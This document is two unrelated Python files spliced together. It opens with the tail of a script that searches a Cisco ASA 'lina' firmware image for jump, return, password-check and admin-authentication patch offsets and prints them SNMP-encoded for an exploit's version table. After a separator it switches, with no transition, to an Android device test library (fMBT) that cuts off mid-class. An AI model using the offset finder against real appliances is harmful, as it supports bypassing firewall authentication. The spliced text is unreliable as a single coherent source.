print("fix_ebp\t= \"72\"\t\t# 0x48")
"""
"9.2(3)" => ["29.112.29.8", # jmp_esp_offset, 0
"134.115.39.9", # saferet_offset, 1
"72", # fix_ebp, 2
"0.128.183.9", # pmcheck_bounds, 3
"16.128.183.9", # pmcheck_offset, 4
"85.49.192.137", # pmcheck_code, 5
"0.80.8.8", # admauth_bounds, 6
"64.90.8.8", # admauth_offset, 7
"85.137.229.87"], # admauth_code, 8
"""
jmp_snmp = hex_to_snmp(jmp_esp_str)
offsets = (jmp_snmp, saferet_snmp, "72", pm_bounds_snmp, pm_offset_snmp, pm_bytes_snmp, adm_bounds_snmp, adm_offset_snmp, adm_bytes_snmp)
print('#"VERS" => ["%s", "%s", "%s", "%s", "%s", "%s", "%s", "%s", "%s"]' % offsets)
if __name__ == '__main__':
import sys
try:
f = Finder(sys.argv[1])
matches = []
for match in f.search(LINA_FIND):
#print(match)
matches.append(match)
post_process(matches)
except IndexError:
print("Usage: %s lina_file" % sys.argv[0])
|
# fMBT, free Model Based Testing tool
# Copyright (c) 2013, Intel Corporation.
#
# This program is free software; you can redistribute it and/or modify it
# under the terms and conditions of the GNU Lesser General Public License,
# version 2.1, as published by the Free Software Foundation.
#
# This program is distributed in the hope it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for
# more details.
#
# You should have received a copy of the GNU Lesser General Public License along with
# this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin St - Fifth Floor, Boston, MA 02110-1301 USA.
#
#
# View._parseDump method contains code that has been published as part
# of the TEMA tool, under the MIT open source license:
#
# Copyright (c) 2006-2010 Tampere University of Technology
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
This library provides a test interface to Android devices.
Device class implements a test interface that is based on Android
Debug Bridge (adb) and Android monkey.
Device's refreshScreenshot() returns a Screenshot object, from which
bitmaps can be searched for.
Device's refreshView() returns a View object, from which UI elements
can be searched according to their id, class, text and other
properties.
Using this library requires that adb is in PATH.
Tips & tricks
-------------
Take a screenshot and save it to a file
import fmbtandroid
fmbtandroid.Device().refreshScreenshot().save("/tmp/screen.png")
* * *
Print view items on device display
import fmbtandroid
print fmbtandroid.Device().refreshView().dumpTree()
* * *
Save generated device ini for modifications
import fmbtandroid
file("/tmp/mydevice.ini", "w").write(fmbtandroid.Device().dumpIni())
* * *
Connect to device based on an ini file
import fmbtandroid
d = fmbtandroid.Device(iniFile=file("/tmp/mydevice.ini"))
d.pressHome()
* * *
Open screenlock by swiping lock.png bitmap on the display to the
east. The lock.png file needs to be in bitmapPath defined in
mydevice.ini.
import fmbtandroid
d = fmbtandroid.Device(iniFile=file("/tmp/mydevice.ini"))
d.refreshScreenshot()
d.swipeBitmap("lock.png", "east")
* * *
Execute a shell command on Android device, show exit status, standard
output and standard error:
import fmbtandroid
status, out, err = fmbtandroid.Device().shellSOE("mkdir /proc/foo")
print 'status: %s, stdout: "%s", stderr: "%s"' % (status, out, err)
* * *
Enable extensive logging with fmbtlogger. You can use functions or
file objects as backends. Example: log to standard output
import fmbtandroid
import fmbtlogger
import sys
d = fmbtandroid.Device()
d = fmbtlogger.text(d, sys.stdout, logDepth=-1)
d.pressPower()
"""
DEVICE_INI_DEFAULTS = '''
[objects]
appsButtonId = id/0x0
appsButtonClass = BubbleTextView
; [application.NAME] sections:
; gridname = exact caption of the application in application grid (text
; property)
; window = string included in topWindow() when application is running
[homescreen]
window = Launcher
'''
import commands
import datetime
import os
import random
import re
import shutil
import socket
import StringIO
import subprocess
import tempfile
import time
import uu
import eyenfinger
import fmbt
_OCRPREPROCESS = [
'-sharpen 5 -level 60%%,60%%,1.0 -filter Mitchell %(zoom)s',
'-sharpen 5 -level 90%%,100%%,3.0 -filter Mitchell -sharpen 5'
]
def _adapterLog(msg):
fmbt.adapterlog("fmbtandroid: %s" % (msg,))
def _logFailedCommand(source, command, exitstatus, stdout, stderr):
_adapterLog('in %s command "%s" failed:\n output: %s\n error: %s\n status: %s' %
(source, command, stdout, stderr, exitstatus))
def _fmbtLog(msg):
fmbt.fmbtlog("fmbtandroid: %s" % (msg,))
def _filenameTimestamp():
return datetime.datetime.now().strftime("%Y%m%d-%H%M%S-%f")
def _run(command, expectedExitStatus = None):
if type(command) == str: shell=True
else: shell=False
try:
p = subprocess.Popen(command, shell=shell,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True)
if expectedExitStatus != None:
out, err = p.communicate()
else:
out, err = ('', None)
except Exception, e:
class fakeProcess(object): pass
p = fakeProcess
p.returncode = 127
out, err = ('', e)
exitStatus = p.returncode
if expectedExitStatus != None:
if ((type(expectedExitStatus) in [list, tuple] and
not exitStatus in expectedExitStatus) or
(type(expectedExitStatus) == int and
not exitStatus == expectedExitStatus)):
msg = 'Unexpected exit status %s from command "%s".\n Output: %s\n Error: %s' % (
exitStatus, command, out, err)
_adapterLog(msg)
if "error: device not found" in err:
raise AndroidDeviceNotFound(msg)
else:
raise Exception(msg)
return (exitStatus, out, err)
def _bitmapPathSolver(fmbtAndroidHomeDir, bitmapPath):
def _solver(bitmap, checkReadable=True):
if bitmap.startswith("/") or os.access(bitmap, os.R_OK):
path = [os.path.dirname(bitmap)]
bitmap = os.path.basename(bitmap)
else:
path = []
for singleDir in bitmapPath.split(":"):
if not singleDir.startswith("/"):
path.append(os.path.join(fmbtAndroidHomeDir, singleDir))
else:
path.append(singleDir)
for singleDir in path:
retval = os.path.join(singleDir, bitmap)
if not checkReadable or os.access(retval, os.R_OK):
break
if checkReadable and not os.access(retval, os.R_OK):
raise ValueError('Bitmap "%s" not readable in bitmapPath %s' % (bitmap, ':'.join(path)))
return retval
return _solver
class Device(object):
"""
The Device class provides
- keywords as its methods
- device properties from device's INI file
- view() returns the most recently refreshed View, that contains
items parsed from window dump.
- screenshot() returns the most recently refreshed Screenshot,
bitmaps can be searched from this.
"""
_PARSE_VIEW_RETRY_LIMIT = 10
def __init__(self, deviceName=None, iniFile=None, connect=True):
"""
Connect to given device, or the first not-connected Android
device in the "adb devices" list, if nothing is defined.
Parameters:
deviceName (string, optional):
If deviceName is a device serial number (an item in
the left most column in "adb devices"), connect to
that device. Device information is read from
$FMBTANDROIDHOME/etc/SERIALNUMBER.ini, if it exists.
If deviceName is a nick name, device information is
looked for from $FMBTANDROIDHOME/etc/deviceName.ini,
and the connection is established to the device with
the serial number given in the ini file.
The default is None. The first disconnected device
in the "adb devices" list is connected to. Device
information is read from
$FMBTANDROIDHOME/etc/SERIALNUMBER.ini, if it exists.
iniFile (file object, optional):
A file object that contains device information
ini. Connect to the device with a serial number
given in this file. The default is None.
To create an ini file for a device, use dumpIni. Example:
file("/tmp/test.ini", "w").write(fmbtandroid.Device().dumpIni())
"""
self._fmbtAndroidHomeDir = os.getenv("FMBTANDROIDHOME", os.getcwd())
self._screenSize = None
self._platformVersion = None
self._lastView = None
self._lastScreenshot = None
self._longPressHoldTime = 2.0
self._longTapHoldTime = 2.0
self._conf = _DeviceConf()
self._loadDeviceAndTestINIs(self._fmbtAndroidHomeDir, deviceName, iniFile)
if deviceName == None:
deviceName = self._conf.value("general", "serial", None)
if connect == False and deviceName == None:
deviceName = "nodevice"
self._conn = None
elif deviceName == None:
# Connect to an unspecified device.
# Go through devices in "adb devices".
listDevicesCommand = "adb devices"
status, output, err = _run(listDevicesCommand, expectedExitStatus = [0, 127])
if status == 127:
raise Exception('adb not found in PATH. Check your Android SDK installation.')
outputLines = [l.strip() for l in output.splitlines()]
try: deviceLines = outputLines[outputLines.index("List of devices attached")+1:]
except: deviceLines = []
deviceLines = [l for l in deviceLines if l.strip() != ""]
if deviceLines == []:
raise Exception('No devices found with "%s"' % (listDevicesCommand,))
potentialDevices = [line.split()[0] for line in deviceLines]
for deviceName in potentialDevices:
try:
self.serialNumber = deviceName
self._conf.set("general", "serial", self.serialNumber)
self._conn = _AndroidDeviceConnection(self.serialNumber)
break
except AndroidConnectionError, e:
continue
else:
raise AndroidConnectionError("Could not connect to device(s): %s." % (
", ".join(potentialDevices)))
# Found a device (deviceName).
self._loadDeviceAndTestINIs(self._fmbtAndroidHomeDir, deviceName, iniFile)
else:
# Device name given, find out the serial number to connect to.
# It may be given in device or test run INI files.
self.serialNumber = self._conf.value("general", "serial", deviceName)
if connect:
self._conn = _AndroidDeviceConnection(self.serialNumber)
_deviceIniFilename = self._fmbtAndroidHomeDir + os.sep + "etc" + os.sep + deviceName + ".ini"
self.loadConfig(_deviceIniFilename, override=True, level="device")
# Fetch properties from device configuration
self.nickName = self._conf.value("general", "name", deviceName)
self.phoneNumber = self._conf.value("general", "phonenumber")
# Loading platform-specific configuration requires a
# connection to the device for checking the platform version.
_platformIniFilename = self._fmbtAndroidHomeDir + os.sep + "etc" + os.sep + "android" + self.platformVersion() + ".ini"
# would we need a form-factor ini, too?
self.loadConfig(_platformIniFilename, override=False, level="platform")
self.loadConfig(StringIO.StringIO(DEVICE_INI_DEFAULTS), override=False, level="global default")
self.wlanAP = self._conf.value("environment", "wlanAP")
self.wlanPass = self._conf.value("environment", "wlanPass")
self.btName = self._conf.value("environment", "BTName")
self.btAccessory = self._conf.value("environment", "BTAccessory")
self.serverIP = self._conf.value("environment", "ServerIP")
self.androidUser = self._conf.value("environment", "AndroidUser")
self.voiceMailNumber = self._conf.value("environment", "VoiceMailNumber")
if self._conn: hw = self._conn._monkeyCommand("getvar build.device")[1]
else: hw = "nohardware"
self.hardware = self._conf.value("general", "hardware", hw)
self.bitmapPath = self._conf.value("paths", "bitmapPath", self._fmbtAndroidHomeDir + os.sep + "bitmaps" + os.sep + self.hardware + "-" + self.platformVersion() + ":.")
self.screenshotDir = self._conf.value("paths", "screenshotDir", self._fmbtAndroidHomeDir + os.sep + "screenshots")
if not os.path.isdir(self.screenshotDir):
try:
os.makedirs(self.screenshotDir)
_adapterLog('created directory "%s" for screenshots' % (self.screenshotDir,))
except Exception, e:
_adapterLog('creating directory "%s" for screenshots failed: %s' (self.screenshotDir, e))
raise
# Caches
self._itemCache = {}
def callContact(self, contact):
"""
Call to given contact.
Return True if successful, otherwise False.
"""
callCommand = 'service call phone 1 s16 "%s"' % (contact,)
status, out, err = self.shellSOE(callCommand)
if status != 0: # TODO: check out/err, too?
_logFailedCommand("callContact", callCommand, status, out, err)
return False
else:
return True
def callNumber(self, number):
"""
Call to given phone number.
Return True if successful, otherwise False.
"""
callCommand = "service call phone 2 s16 %s" % (number,)
status, out, err = self.shellSOE(callCommand)
if status != 0: # TODO: check out/err, too?
_logFailedCommand("callNumber", callCommand, status, out, err)
return False
else:
return True
def close(self):
if hasattr(self, "_conn"):
del self._conn
if hasattr(self, "_lastView"):
del self._lastView
if hasattr(self, "_lastScreenshot"):
del self._lastScreenshot
import gc
gc.collect()
def dumpIni(self):
"""
Returns contents of current device configuration as a string (in
INI format).
"""
return self._conf.dump()
def drag(self, (x1, y1), (x2, y2), delayBetweenMoves=0.01, delayBeforeMoves=0, delayAfterMoves=0, movePoints=20):
"""
Touch the screen on coordinates (x1, y1), drag along straight
line to coordinates (x2, y2), and raise fingertip.
coordinates (floats in range [0.0, 1.0] or integers):
floating point coordinates in range [0.0, 1.0] are
scaled to full screen width and height, others are
handled as absolute coordinate values.
delayBeforeMoves (float, optional):
seconds to wait after touching and before dragging.
delayBetweenMoves (float, optional):
seconds to wait when moving between points when
dragging.
delayAfterMoves (float, optional):
seconds to wait after dragging, before raising
fingertip.
movePoints (integer, optional):
the number of intermediate move points between end
points of the line.
Returns True on success, False if sending input failed.
"""
x1, y1 = self.intCoords((x1, y1))
x2, y2 = self.intCoords((x2, y2))
if not self._conn.sendTouchDown(x1, y1): return False
time.sleep(delayBeforeMoves)
for i in xrange(0, movePoints):
nx = x1 + int(round(((x2 - x1) / float(movePoints+1)) * (i+1)))
ny = y1 + int(round(((y2 - y1) / float(movePoints+1)) * (i+1)))
if not self._conn.sendTouchMove(nx, ny): return False
if i < movePoints - 1: time.sleep(delayBetweenMoves)
time.sleep(delayAfterMoves)
if self._conn.sendTouchUp(x2, y2): return True
return False
def intCoords(self, (x, y)):
"""
Convert floating point coordinate values in range [0.0, 1.0] to
screen coordinates.
"""
width, height = self.screenSize()
if 0 <= x <= 1 and type(x) == float: x = x * width
if 0 <= y <= 1 and type(y) == float: y = y * height
return (int(round(x)), int(round(y)))
def loadConfig(self, filenameOrObj, override=True, level=""):
try:
if type(filenameOrObj) == str:
filename = filenameOrObj
fileObj = file(filenameOrObj)
else:
fileObj = filenameOrObj
filename = getattr(fileObj, "name", "<string>")
if hasattr(fileObj, "seek"):
fileObj.seek(0)
self._conf.addFile(fileObj, override=override)
except Exception, e:
_adapterLog('Loading %s configuration from "%s" failed: %s' % (level, filename, e))
return
_adapterLog('Loaded %s configuration from "%s"' % (level, filename))
def platformVersion(self):
"""
Returns the platform version of the device.
"""
if self._platformVersion == None:
if self._conn:
self._platformVersion = self._conn.recvVariable("build.version.release")
else:
self._platformVersion = "nosoftware"
return self._platformVersion
def pressBack(self, **pressKeyKwArgs):
"""
Press the back button.
Optional parameters are the same as for pressKey.
"""
return self.pressKey("KEYCODE_BACK", **pressKeyKwArgs)
def pressHome(self, **pressKeyKwArgs):
"""
Press the home button.
Optional parameters are the same as for pressKey.
"""
return self.pressKey("KEYCODE_HOME", **pressKeyKwArgs)
def pressKey(self, keyName, long=False, hold=0.0):
"""
Press a key on the device.
Parameters:
keyName (string):
the name of the key, like KEYCODE_HOME. If KEYCODE_
prefix is not given, it is added. Refer to Android
KeyEvent documentation.
long (boolean, optional):
if True, press the key for long time.
hold (float, optional):
time in seconds to hold the key down.
"""
if not keyName.upper().startswith("KEYCODE_"):
keyName = "KEYCODE_" + keyName
keyName = keyName.upper()
if long and hold == None:
hold = self._longPressHoldTime
if hold > 0.0:
try:
assert self._conn.sendKeyDown(keyName)
time.sleep(hold)
assert self._conn.sendKeyUp(keyName)
except:
return False
return True
return self._conn.sendPress(keyName)
def pressMenu(self, **pressKeyKwArgs):
"""
Press the menu button.
Optional parameters are the same as for pressKey.
"""
return self.pressKey("KEYCODE_MENU", **pressKeyKwArgs)
def pressPower(self, **pressKeyKwArgs):
"""
Press the power button.
Optional parameters are the same as for pressKey.
"""
return self.pressKey("KEYCODE_POWER", **pressKeyKwArgs)
def pressVolumeUp(self, **pressKeyKwArgs):
"""
Press the volume up button.
Optional parameters are the same as for pressKey.
"""
return self.pressKey("KEYCODE_VOLUME_UP", **pressKeyKwArgs)
def pressVolumeDown(self, **pressKeyKwArgs):
"""
Press the volume down button.
Optional parameters are the same as for pressKey.
"""
return self.pressKey("KEYCODE_VOLUME_DOWN", **pressKeyKwArgs)
def reboot(self, reconnect=True, firstBoot=False):
"""
Reboot the device.
Parameters
reconnect (boolean, optional)
If True, do not return until the device has been
connected after boot. Otherwise return once reboot
command has been sent. The default is True.
firstBoot (boolean, optional)
If True, the device boots like it would have been
flashed. Requires that "adb root" works. The default
is False.
Returns True on success, otherwise False.
"""
return self._conn.reboot(reconnect, firstBoot, 120)
def reconnect(self):
"""
Close connections to the device and reconnect.
"""
del self._conn
try:
self._conn = _AndroidDeviceConnection(self.serialNumber)
return True
except Exception, e:
_adapterLog("reconnect failed: %s" % (e,))
return False
def refreshScreenshot(self, forcedScreenshot=None):
"""
Takes new screenshot from the device and updates latest
screenshot object.
Parameters:
forcedScreenshot (Screenshot or string, optional):
use given screenshot or image file, do not take new
screenshot.
Returns created Screenshot object.
"""
if forcedScreenshot != None:
if type(forcedScreenshot) == str:
self._lastScreenshot = Screenshot(
screenshotFile=forcedScreenshot,
pathSolver=_bitmapPathSolver(self._fmbtAndroidHomeDir, self.bitmapPath),
screenSize=self.screenSize())
else:
self._lastScreenshot = forcedScreenshot
else:
screenshotFile = self._conn.screenshot(screenshotDir=self.screenshotDir)
self._lastScreenshot = Screenshot(
screenshotFile=screenshotFile,
pathSolver=_bitmapPathSolver(self._fmbtAndroidHomeDir, self.bitmapPath),
screenSize=self.screenSize())
return self._lastScreenshot
def refreshView(self, forcedView=None):
"""
(Re)reads view items on display and updates the latest View
object.
Parameters:
forcedView (View or filename, optional):
use given View object or view file instead of reading
items from the device.
Returns created View object.
"""
def formatErrors(errors):
return "refreshView parse errors:\n %s" % (
"\n ".join(["line %s: %s error: %s" % e for e in errors]),)
if forcedView != None:
if isinstance(forcedView, View):
self._lastView = forcedView
elif type(forcedView) == str:
self._lastView = View(self.screenshotDir, self.serialNumber, file(forcedView).read())
_adapterLog(formatErrors(self._lastView.errors()))
else:
raise ValueError("forcedView must be a View object or a filename")
return self._lastView
retryCount = 0
while True:
dump = self._conn.recvViewData()
if dump == None: # dump unreadable
return None
view = View(self.screenshotDir, self.serialNumber, dump)
if len(view.errors()) > 0 and retryCount < self._PARSE_VIEW_RETRY_LIMIT:
_adapterLog(formatErrors(view.errors()))
retryCount += 1
time.sleep(0.2) # sleep before retry
else:
# successfully parsed or parsed with errors but no more retries
self._lastView = view
return view
def screenshot(self):
"""
Returns the latest Screenshot object.
Use refreshScreenshot() to get a new screenshot.
"""
return self._lastScreenshot
def screenSize(self):
"""
Returns screen size in pixels in tuple (width, height).
"""
if self._screenSize == None:
self._screenSize = self._conn.recvScreenSize()
return self._screenSize
def shell(self, shellCommand):
"""
Execute shellCommand in adb shell.
shellCommand is a string (arguments separated by whitespace).
Returns output of "adb shell" command.
If you wish to receive exitstatus or standard output and error
separated from shellCommand, refer to shellSOE().
"""
return self._conn._runAdb(["shell", shellCommand])[1]
def shellSOE(self, shellCommand):
"""
Execute shellCommand in adb shell.
shellCommand is a string (arguments separated by whitespace).
Returns tuple (exitStatus, standardOutput, standardError).
Requires tar and uuencode to be available on the device.
"""
return self._conn.shellSOE(shellCommand)
def smsNumber(self, number, message):
"""
Send message using SMS to given number.
Parameters:
number (string)
phone number to which the SMS will be sent
message (string)
the message to be sent.
Returns True on success, otherwise False.
"""
smsCommand = ('am start -a android.intent.action.SENDTO ' +
'-d sms:%s --es sms_body "%s"' +
' --ez exit_on_sent true') % (number, message)
status, out, err = self.shellSOE(smsCommand)
if status != 0:
_logFailedCommand("sms", smsCommand, status, out, err)
return False
_adapterLog("SMS command returned %s" % (out + err,))
time.sleep(2)
self.pressKey("KEYCODE_DPAD_RIGHT")
time.sleep(1)
self.pressKey("KEYCODE_ENTER")
return True
def supportsView(self):
"""
Check if connected device supports reading view data.
View data is needed by refreshView(), view(), verifyText() and
waitText(). It is produced by Android window dump.
Returns True if view data can be read, otherwise False.
"""
try:
self._conn.recvViewData()
return True
except AndroidConnectionError:
return False
def swipe(self, (x, y), direction, **dragKwArgs):
"""
swipe starting from coordinates (x, y) to direction ("n", "s",
"e" or "w"). Swipe ends to the edge of the screen.
Coordinates and keyword arguments are the same as for the drag
function.
Returns True on success, False if sending input failed.
"""
d = direction.lower()
if d in ["n", "north"]: x2, y2 = self.intCoords((x, 0.0))
elif d in ["s", "south"]: x2, y2 = self.intCoords((x, 1.0))
elif d in ["e", "east"]: x2, y2 = self.intCoords((1.0, y))
elif d in ["w", "west"]: x2, y2 = self.intCoords((0.0, y))
else:
msg = 'Illegal direction "%s"' % (direction,)
_adapterLog(msg)
raise Exception(msg)
return self.drag((x, y), (x2, y2), **dragKwArgs)
def swipeBitmap(self, bitmap, direction, colorMatch=1.0, area=(0.0, 0.0, 1.0, 1.0), **dragKwArgs):
"""
swipe starting from bitmap to direction ("n", "s", "e", or
"w"). Swipe ends to the edge of the screen.
Parameters:
colorMatch, area
refer to verifyBitmap documentation.
delayBeforeMoves, delayBetweenMoves, delayAfterMoves,
movePoints
refer to drag documentation.
Returns True on success, False if sending input failed.
"""
assert self._lastScreenshot != None, "Screenshot required."
items = self._lastScreenshot.findItemsByBitmap(bitmap, colorMatch=colorMatch, area=area)
if len(items) == 0:
_adapterLog("swipeBitmap: bitmap %s not found from %s" % (bitmap, self._lastScreenshot.filename()))
return False
return self.swipeItem(items[0], direction, **dragKwArgs)
def swipeItem(self, viewItem, direction, **dragKwArgs):
"""
swipe starting from viewItem to direction ("n", "s", "e" or
"w"). Swipe ends to the edge of the screen.
Keyword arguments are the same as for the drag function.
Returns True on success, False if sending input failed.
"""
return self.swipe(viewItem.coords(), direction, **dragKwArgs)
def systemProperty(self, propertyName):
"""
Returns Android Monkey Device properties, such as
"clock.uptime", refer to Android Monkey documentation.
"""
return self._conn.recvVariable(propertyName)
def tap(self, (x, y), long=False, hold=0.0):
"""
Tap screen on coordinates (x, y).
Parameters:
coordinates (floats in range [0.0, 1.0] or integers):
floating point coordinates in range [0.0, 1.0] are
scaled to full screen width and height, others are
handled as absolute coordinate values.
long (boolean, optional):
if True, touch the screen for a long time.
hold (float, optional):
time in seconds to touch the screen.
Returns True if successful, otherwise False.
"""
x, y = self.intCoords((x, y))
if long and hold == None:
hold = self._longTapHoldTime
if hold > 0.0:
try:
assert self._conn.sendTouchDown(x, y)
time.sleep(hold)
assert self._conn.sendTouchUp(x, y)
except:
return False
return True
else:
return self._conn.sendTap(x, y)
def tapBitmap(self, bitmap, **tapKwArgs):
"""
Find a bitmap from the latest screenshot, and tap it.
"""
assert self._lastScreenshot != None, "Screenshot required."
items = self._lastScreenshot.findItemsByBitmap(bitmap)
if len(items) == 0:
_adapterLog("tapBitmap: bitmap %s not found from %s" % (bitmap, self._lastScreenshot.filename()))
return False
return self.tapItem(items[0], **tapKwArgs)
def tapId(self, viewItemId, **tapKwArgs):
"""
Find an item with given id from the latest view, and tap it.
"""
assert self._lastView != None, "View required."
items = self._lastView.findItemsById(viewItemId, count=1)
if len(items) > 0:
return self.tapItem(items[0], **tapKwArgs)
else:
_adapterLog("tapItemById(%s): no items found" % (viewItemId,))
return False
def tapItem(self, viewItem, **tapKwArgs):
"""
Tap the center point of viewItem.
"""
return self.tap(viewItem.coords(), **tapKwArgs)
def tapOcrText(self, word, match=1.0, preprocess=None, **tapKwArgs):
"""
Find the given word from the latest screenshot using OCR, and
tap it.
Parameters:
word (string):
the word to be tapped.
match (float, optional):
minimum match score in range [0.0, 1.0].
The default is 1.0 (exact match).
preprocess (string, optional):
preprocess filter to be used in OCR for better
result. Refer to eyenfinger.autoconfigure to search
for a good one.
long, hold (optional):
refer to tap documentation.
Returns True if successful, otherwise False.
"""
assert self._lastScreenshot != None, "Screenshot required."
items = self._lastScreenshot.findItemsByOcr(word, match=match, preprocess=preprocess)
if len(items) == 0: return False
return self.tapItem(items[0], **tapKwArgs)
def tapText(self, text, partial=False, **tapKwArgs):
"""
Find an item with given text from the latest view, and tap it.
Parameters:
partial (boolean, optional):
refer to verifyText documentation. The default is
False.
long, hold (optional):
refer to tap documentation.
Returns True if successful, otherwise False.
"""
assert self._lastView != None, "View required."
items = self._lastView.findItemsByText(text, partial=partial, count=1)
if len(items) == 0: return False
return self.tapItem(items[0], **tapKwArgs)
def topApp(self):
"""
Returns the name of the top application.
"""
return self._conn.recvTopAppWindow()[0]
def topWindow(self):
"""
Returns the name of the top window.
"""
return self._conn.recvTopAppWindow()[1]
def type(self, text):
return self._conn.sendType(text)
def verifyOcrText(self, word, match=1.0, preprocess=None):
"""
Verify using OCR that the last screenshot contains the given word.
Parameters:
word (string):
the word to be searched for.
match (float, optional):
minimum match score in range [0.0, 1.0].
The default is 1.0 (exact match).
preprocess (string, optional):
preprocess filter to be used in OCR for better
result. Refer to eyenfinger.autoconfigure to search
for a good one.
long, hold (optional):
refer to tap documentation.
Returns True if successful, otherwise False.
"""
assert self._lastScreenshot != None, "Screenshot required."
return self._lastScreenshot.findItemsByOcr(word, match=match, preprocess=preprocess) != []
def verifyText(self, text, partial=False):
"""
Verify that the last view has at least one item with given
text.
Parameters:
text (string):
text to be searched for in items.
partial (boolean, optional):
if True, match items if item text contains given
text, otherwise match only if item text is equal to
the given text. The default is False (exact match).
"""
assert self._lastView != None, "View required."
return self._lastView.findItemsByText(text, partial=partial, count=1) != []
def verifyBitmap(self, bitmap, colorMatch=1.0, area=(0.0, 0.0, 1.0, 1.0)):
"""
Verify that bitmap is present in the last screenshot.
Parameters:
bitmap (string):
filename of the bitmap file to be searched for.
colorMatch (float, optional):
required color matching accuracy. The default is 1.0
(exact match). For instance, 0.75 requires that
every pixel's every RGB component value on the
bitmap is at least 75 % match with the value of
corresponding pixel's RGB component in the
screenshot.
area ((left, top, right, bottom), optional):
search bitmap from the given area only. Left, top
right and bottom are either absolute coordinates
(integers) or floats in range [0.0, 1.0]. In the
latter case they are scaled to screenshot
dimensions. The default is (0.0, 0.0, 1.0, 1.0),
that is, search everywhere in the screenshot.
"""
assert self._lastScreenshot != None, "Screenshot required."
if self._lastScreenshot == None:
return False
return self._lastScreenshot.findItemsByBitmap(bitmap, colorMatch=colorMatch, area=area) != []
def view(self):
"""
Returns the last view (the most recently refreshed view).
"""
return self._lastView
def wait(self, refreshFunc, waitFunc, waitFuncArgs, waitFuncKwargs={}, waitTime = 5.0, pollDelay = 1.0):
"""
Wait until waitFunc returns True or waitTime has expired.
Parameters:
refreshFunc (function):
this function is called before re-evaluating
waitFunc. For instance, refreshView or
refreshScreenshot.
waitFunc, waitFuncArgs, waitFuncKwargs (function, tuple,
dictionary):
wait for waitFunc(waitFuncArgs, waitFuncKwargs) to
return True
waitTime (float, optional):
max. time in seconds to wait for.
pollDelay (float, optional):
time in seconds to sleep between refreshs.
Returns True if waitFunc returns True - either immediately or
before waitTime has expired - otherwise False.
"""
if waitFunc(*waitFuncArgs, **waitFuncKwargs):
return True
startTime = time.time()
endTime = startTime + waitTime
now = startTime
while now < endTime:
time.sleep(min(pollDelay, (endTime - now)))
now = time.time()
refreshFunc()
if waitFunc(*waitFuncArgs, **waitFuncKwargs):
return True
return False
def waitBitmap(self, bitmap, colorMatch=None, area=None, **waitKwArgs):
"""
Wait until bitmap appears on screen.
Parameters:
bitmap (string):
filename of the bitmap to be waited for.
colorMatch, area (optional):
refer to verifyBitmap documentation.
waitTime, pollDelay (float, optional):
refer to wait documentation.
Returns True if bitmap appeared within given time limit,
otherwise False.
Updates the last screenshot.
"""
verifyBitmapKwArgs = {}
if colorMatch != None: verifyBitmapKwArgs['colorMatch'] = colorMatch
if area != None: verifyBitmapKwArgs['area'] = area
return self.wait(self.refreshScreenshot,
self.verifyBitmap, (bitmap,), verifyBitmapKwArgs,
**waitKwArgs)
def waitText(self, text, partial=False, **waitKwArgs):
"""
Wait until text appears in any view item.
Parameters:
text (string):
text to be waited for.
partial (boolean, optional):
refer to verifyText. The default is False.
waitTime, pollDelay (float, optional):
refer to wait.
Returns True if text appeared within given time limit,
otherwise False.
Updates the last view.
"""
return self.wait(self.refreshView,
self.verifyText, (text,), {'partial': partial},
**waitKwArgs)
def _bitmapFilename(self, bitmap, checkReadable=True):
if bitmap.startswith("/") or os.access(bitmap, os.R_OK):
path = [os.path.dirname(bitmap)]
bitmap = os.path.basename(bitmap)
else:
path = []
for singleDir in self.bitmapPath.split(":"):
if not singleDir.startswith("/"):
path.append(os.path.join(self._fmbtAndroidHomeDir, singleDir))
else:
path.append(singleDir)
for singleDir in path:
retval = os.path.join(singleDir, bitmap)
if not checkReadable or os.access(retval, os.R_OK):
break
if checkReadable and not os.access(retval, os.R_OK):
raise ValueError('Bitmap "%s" not readable in bitmapPath %s' % (bitmap, ':'.join(path)))
return retval
def _loadDeviceAndTestINIs(self, homeDir, deviceName, iniFile):
if deviceName != None:
_deviceIniFilename = homeDir + os.sep + "etc" + os.sep + deviceName + ".ini"
self.loadConfig(_deviceIniFilename, override=True, level="device")
if iniFile:
self.loadConfig(iniFile, override=True, level="test")
class _DeviceConf:
"""
Miniparser for INI files like:
[section1]
key1 = value1
; commented = out
# commented = out
"""
def __init__(self, fileObj=None):
# _conf is a dictionary:
# (section, key) -> value
self._conf = {}
if fileObj:
self.addFile(fileObj)
def addFile(self, fileObj, override=True):
for line in fileObj:
line = line.strip()
if line.startswith('[') and line.endswith(']'):
section = line[1:-1].strip()
elif line.startswith(";") or line.startswith("#"):
continue
elif '=' in line:
key, value = line.split('=')
if override or (section, key.strip()) not in self._conf:
self._conf[(section, key.strip())] = value.strip()
def sections(self):
return list(set([k[0] for k in self._conf.keys()]))
def keys(self, section):
return [k[1] for k in self._conf.keys() if k[0] == section]
def dump(self):
lines = []
for section in sorted(self.sections()):
lines.append("[%s]" % (section,))
for key in sorted(self.keys(section)):
lines.append("%-16s = %s" % (key, self._conf[(section, key)]))
lines.append("")
return "\n".join(lines)
def set(self, section, key, value):
self._conf[(section, key)] = value
def value(self, section, key, default=""):
"""
Returns the value associated with the key in the section.
The default is returned if the key is not found.
dump() will dump also sections and keys with
default values that have been returned.
"""
if not (section, key) in self._conf:
self._conf[(section, key)] = default
return self._conf[(section, key)]
class Screenshot(object):
"""
